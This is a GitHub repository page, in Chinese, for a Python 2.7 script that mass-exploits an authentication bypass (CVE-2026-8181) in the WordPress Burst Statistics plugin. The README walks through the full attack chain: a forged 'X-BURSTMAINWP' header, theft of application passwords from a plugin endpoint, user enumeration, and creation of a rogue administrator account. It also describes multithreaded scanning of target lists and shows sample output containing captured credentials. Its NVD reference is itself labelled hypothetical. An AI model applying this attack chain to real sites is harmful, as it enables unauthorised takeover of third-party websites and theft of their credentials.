Jenderal92/CVE-2026-8181

GitHub: Jenderal92/CVE-2026-8181

针对 WordPress Burst Statistics 插件身份验证绕过漏洞的批量利用脚本,可自动化完成从用户枚举到管理员账户创建的完整攻击链。

Stars: 0 | Forks: 0

# CVE-2026-8181 - Burst Statistics 身份验证绕过漏洞利用 针对 Burst Statistics 插件漏洞 (CVE-2026-8181) 的 **Python 2.7** 漏洞利用程序。该漏洞允许未经身份验证的攻击者绕过 REST API 身份验证,获取应用密码,并在存在漏洞的 WordPress 站点上创建新的管理员用户。 ## 漏洞概述 CVE-2026-8181 影响 WordPress 的 Burst Statistics 插件(补丁发布之前的版本)。该缺陷存在于 REST API 身份验证机制中,允许攻击者: - 通过发送特制的 `X-BURSTMAINWP` 请求头绕过身份验证 - 通过 `/burst/v1/mainwp-auth` 端点获取应用密码 - 通过 WordPress REST API 执行特权操作(列出用户、读取设置、创建新的管理员账户) ## 功能 - 多线程扫描(默认 10 个线程) - 自动检测 WordPress 基础路径 (`/`, `/wordpress`, `/wp`) - 通过 `/wp-json/wp/v2/users` 或作者 ID 重定向进行用户名枚举 - 利用身份验证绕过漏洞以: - 获取应用密码(Base64 编码的 token) - 验证对敏感 REST 端点(设置、插件、管理员用户)的访问权限 - 使用随机凭据创建新的管理员用户 - 将成功的结果保存到 `res.txt` ## 环境要求 - **Python 2.7**(已弃用,但本脚本需要) - `requests` 库 ``` pip install requests ``` ## 使用说明 1. 准备一个目标列表文件(每行一个域名或 IP,带或不带 `http://`/`https://` 均可)。 示例 `targets.txt`: example.com https://vulnerable-site.com 127.0.0.1/wordpress 2. 运行漏洞利用程序: ``` python2 CVE-2026-8181.py targets.txt ``` 3. 结果将保存在当前目录的 `res.txt` 中。 ### 命令行选项 | 参数 | 描述 | |--------------|--------------------------------------| | `list.txt` | 包含目标 URL 的文件路径 | ### 示例输出 ``` ============================================================ CVE-2026-8181 - Burst Statistics Auth Bypass Exploit ============================================================ [*] Total targets: 2 [*] Threads: 10 [*] Base paths: ['', '/wordpress', '/wp'] [*] Scanning: example.com Trying path: / Detected username: admin [+] VULNERABLE! REST API bypass successful [+] Application Password obtained! [+] Username: admin [+] App Password: xxxx xxxx xxxx [+] Base64 Token: YWRtaW46eHh4eA== [+] Access confirmed: WordPress settings [+] Access confirmed: Installed plugins [+] Access confirmed: Admin users [+] Admin user created via REST API: wp_abc123 [+] Results saved to res.txt ``` ## 输出文件格式 (`res.txt`) 对于每个存在漏洞的目标,脚本会追加写入: ``` ============================================================ Target: http://example.com ============================================================ [+] Access Verification: [+] WordPress settings [+] Installed plugins [+] Admin users [+] REST API Credentials: Username: wp_abc123 Password: random12char Note: Use with X-BURSTMAINWP header [+] Application Password: Username: admin App Password: xxxx xxxx xxxx Base64 Token: YWRtaW46eHh4eA== ``` ## 工作原理 1. **目标准备** – 如果缺少 `http://` 前缀则添加,去除末尾的斜杠。 2. **路径迭代** – 尝试将 `/`、`/wordpress` 和 `/wp` 作为 WordPress 基础目录。 3. **用户名枚举** – 获取 `/wp-json/wp/v2/users` 或使用 `?author=N` 重定向。 4. **绕过测试** – 发送 `X-BURSTMAINWP: 1` + 使用用户名和虚拟密码 (`CVE-2026-8181`) 进行 Basic 认证。如果端点 `/wp-json/wp/v2/users/me?context=edit` 返回 200,则该站点存在漏洞。 5. **漏洞利用** – - 请求 `/wp-json/burst/v1/mainwp-auth` 以获取应用密码 token。 - 验证对 `/settings`、`/plugins`、`/users` 的访问权限。 - 通过 `POST /wp-json/wp/v2/users` 创建新的管理员账户。 6. **结果保存** – 将所有获取到的凭据写入 `res.txt`。 ## 自定义 您可以修改脚本内的以下变量: - `THREADS` – 并发线程数(默认 10) - `BASE_PATHS` – 要检查的额外 WordPress 子目录 - `requests` 的超时值 ## 注意事项 - 本脚本使用 Python 2.7 – 请确保已安装,或考虑将其移植到 Python 3。 - 为简单起见,已禁用 SSL 证书验证 (`verify=False`)。 - 本漏洞利用程序依赖于 Burst Statistics 插件处于活动状态且未打补丁。 ## 许可证 本项目仅供教育目的使用。使用风险自负。 ## 参考文献 - [CVE-2026-8181 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-8181) (假设的) - Burst Statistics 插件(受影响的版本)
标签:Burst Statistics, CISA项目, CVE-2026-8181, Python 2.7, REST API接管, SEO词: WordPress Exploit, Web安全, Web报告查看器, WordPress插件漏洞, 协议分析, 多线程扫描, 应用密码窃取, 未授权访问, 权限提升, 漏洞利用脚本(Exploit), 管理员账户创建, 自动化渗透测试, 蓝队分析, 身份验证绕过